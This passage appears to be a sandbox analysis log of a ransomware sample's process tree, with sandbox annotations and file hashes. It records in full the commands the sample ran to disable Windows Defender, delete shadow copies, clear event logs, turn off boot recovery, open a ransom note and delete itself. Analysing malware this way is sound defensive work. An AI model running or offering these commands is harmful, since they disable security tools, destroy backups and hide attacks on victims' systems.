- Launches sc.exe
PID:1600
-
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:1716
-
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:888
-
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:1656
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:556
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1076
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1732
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1956
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1616
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1704
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1552
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:608
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:284
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:672
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1116
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1692
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1064
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:2020
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1008
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:804
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1740
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:576
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1776
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1664
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1984
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1736
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:856
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1412
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1660
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:524
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1176
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1336
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:580
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1964
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2000
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1152
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1596
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1520
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:776
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1120
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1204
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1284
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1644
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:952
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1364
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:968
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1212
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1760
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1832
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1212
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1816
-
-
-
C:\Windows\system32\notepad.exenotepad.exe C:\n8pw_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2256
-
-
C:\Windows\system32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\0e4d44dde522c07d09d9e3086cfae803.exe"2⤵PID:2264
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2288
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD54633abe45903b79e0f2a0801dbc51048
SHA1bee33ffaf1cc70b160c58b52d1f9c51b6fbbf836
SHA2567d0c8edbeb4d4f45ad1f1486a3ee0c615901f9cdc3f23898f572ad479dc10592
SHA5129d9619b3d97833fa85d3bd881122d065f67b67b327c310c160bdc97be64919d23654d529c010ac69b0c33781865ba2e2613fcf0871ffbefe0438aa5fa422564e
-
Filesize
1KB
MD5d3eca3baec61c36c9353ef1699b8bfca
SHA1f084193262e0d462165cfac58e1422ab90df7514
SHA2563ef5776a2dfd960f996ab765efa2b117d3e3135dc8e196aa7bdc525bd4125678
SHA5128d8eb00e0764ea07a999d0f07bd21f4f4b8169f19673de0cea833670c38edd41792136a63036477bebeb2a0fbbca5f4faafb381f8fd4ffb178d4209e073e2a17